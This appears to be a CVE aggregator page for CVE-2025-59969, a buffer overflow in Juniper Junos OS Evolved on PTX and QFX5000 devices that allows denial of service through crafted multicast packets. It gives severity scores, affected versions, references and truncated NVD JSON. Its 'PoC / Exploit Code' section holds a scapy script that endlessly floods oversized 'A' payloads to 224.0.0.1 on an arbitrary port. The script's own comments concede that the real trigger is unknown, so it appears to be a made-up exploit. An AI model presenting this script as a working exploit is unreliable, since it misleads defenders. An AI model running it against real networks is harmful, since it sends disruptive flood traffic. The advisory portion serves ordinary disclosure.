CVE-2025-59969

Description

A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the advanced forwarding toolkit (evo-aftmand/evo-pfemand) of Juniper Networks Junos OS Evolved on PTX Series or QFX5000 Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS).An attacker sending crafted multicast packets will cause line cards running evo-aftmand/evo-pfemand to crash and restart or non-line card devices to crash and restart. Continued receipt and processing of these packets will sustain the Denial of Service (DoS) condition. This issue affects Junos OS Evolved PTX Series: * All versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before 24.4R2-EVO. This issue affects Junos OS Evolved on QFX5000 Series: * 22.2-EVO version before 22.2R3-S7-EVO, * 22.4-EVO version before 22.4R3-S7-EVO, * 23.2-EVO versions before 23.2R2-S4-EVO, * 23.4-EVO versions before 23.4R2-S5-EVO, * 24.2-EVO versions before 24.2R2-S1-EVO, * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO. This issue does not affect Junos OS Evolved on QFX5000 Series versions before: 21.2R2-S1-EVO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EVO, and 22.1R1-EVO.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos_os_evolved:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.4:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.4:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.4:r1-s2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:juniper:ptx10001-36mr:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:ptx10002-36qdd:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:ptx10003:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:ptx10004:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:ptx10008:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.2:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.2:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.2:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.2:r1-s2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos_os_evolved:22.2:r2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:juniper:qfx5110:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:qfx5120:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:qfx5130:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:qfx5200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:qfx5210:-:*:*:*:*:*:*:* - NOT VULNERABLE

Junos OS Evolved PTX < 22.4R3-S8-EVO

Junos OS Evolved PTX >= 23.2 < 23.2R2-S5-EVO

Junos OS Evolved PTX >= 23.4 < 23.4R2-EVO

Junos OS Evolved PTX >= 24.2 < 24.2R2-EVO

Junos OS Evolved PTX >= 24.4 < 24.4R2-EVO

Junos OS Evolved QFX5000 22.2-EVO < 22.2R3-S7-EVO

Junos OS Evolved QFX5000 22.4-EVO < 22.4R3-S7-EVO

Junos OS Evolved QFX5000 23.2-EVO < 23.2R2-S4-EVO

Junos OS Evolved QFX5000 23.4-EVO < 23.4R2-S5-EVO

Junos OS Evolved QFX5000 24.2-EVO < 24.2R2-S1-EVO

Junos OS Evolved QFX5000 24.4-EVO < 24.4R1-S3-EVO, 24.4R2-EVO

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

from scapy.all import *

# Target IP (Multicast address used by the vulnerable service)
target_ip = "224.0.0.1" 
target_port = 12345 

# Craft a malicious packet
# Note: The specific payload size and content needed to trigger the overflow
# may vary based on the specific Junos version and deployment.
# This example sends a large payload to simulate the overflow condition.
payload = b"A" * 10000  

packet = IP(dst=target_ip)/UDP(dport=target_port)/Raw(load=payload)

print("[*] Sending crafted multicast packet to trigger buffer overflow...")
send(packet, loop=1, inter=0.1)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59969
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59969
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59969/
[4] VulDB https://vuldb.com/cve/CVE-2025-59969
[5] https://kb.juniper.net/JSA103159

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59969", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:24.100", "lastModified": "2026-04-28T20:18:35.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in the advanced forwarding toolkit (evo-aftmand/evo-pfemand) of Juniper Networks Junos OS Evolved on PTX Series or QFX5000 Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS).An attacker sending crafted multicast packets will cause line cards running evo-aftmand/evo-pfemand to crash and restart or non-line card devices to crash and restart. Continued receipt and processing of these packets will sustain the Denial of Service (DoS) condition.\n\nThis issue affects Junos OS Evolved PTX Series:\n\n\n\n * All versions before 22.4R3-S8-EVO,\n * from 23.2 before 23.2R2-S5-EVO,\n * from 23.4 before 23.4R2-EVO,\n * from 24.2 before 24.2R2-EVO,\n * from 24.4 before 24.4R2-EVO.\n\n\n\n\nThis issue affects Junos OS Evolved on QFX5000 Series:\n\n\n\n * 22.2-EVO version before 22.2R3-S7-EVO,\n * 22.4-EVO version before 22.4R3-S7-EVO,\n * 23.2-EVO versions before 23.2R2-S4-EVO,\n * 23.4-EVO versions before 23.4R2-S5-EVO, \n * 24.2-EVO versions before 24.2R2-S1-EVO,\n * 24.4-EVO versions before 24.4R1-S3-EVO, 24.4R2-EVO.\n\n\nThis issue does not affect Junos OS Evolved on QFX5000 Series versions before: 21.2R2-S1-EVO, 21.2R3-EVO, 21.3R2-EVO, 21.4R1-EVO, and 22.1R1-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:M/U:Amber", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "A9925263-E7B7-49AA-8271-AF320F355B80"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "0A33C425-921F-4795-B834-608C8F1597E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "93887799-F62C-4A4A-BCF5-004D0B4D4154"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "62C473D2-2612-4480-82D8-8A24D0687BBD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "7FB4C5CA-A709-4B13-A9E0-372098A72AD3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r2:*:*:*:*:*:*", "matchCriteriaId": "04CE952D-E3C1-4B34-9E65-EC52BFE887AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "8AE9D1A7-4721-4E1D-B965-FDC38126B1DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:22.4:r2-s2:*:*:*:*:*:*", "matchCriteri ... (truncated)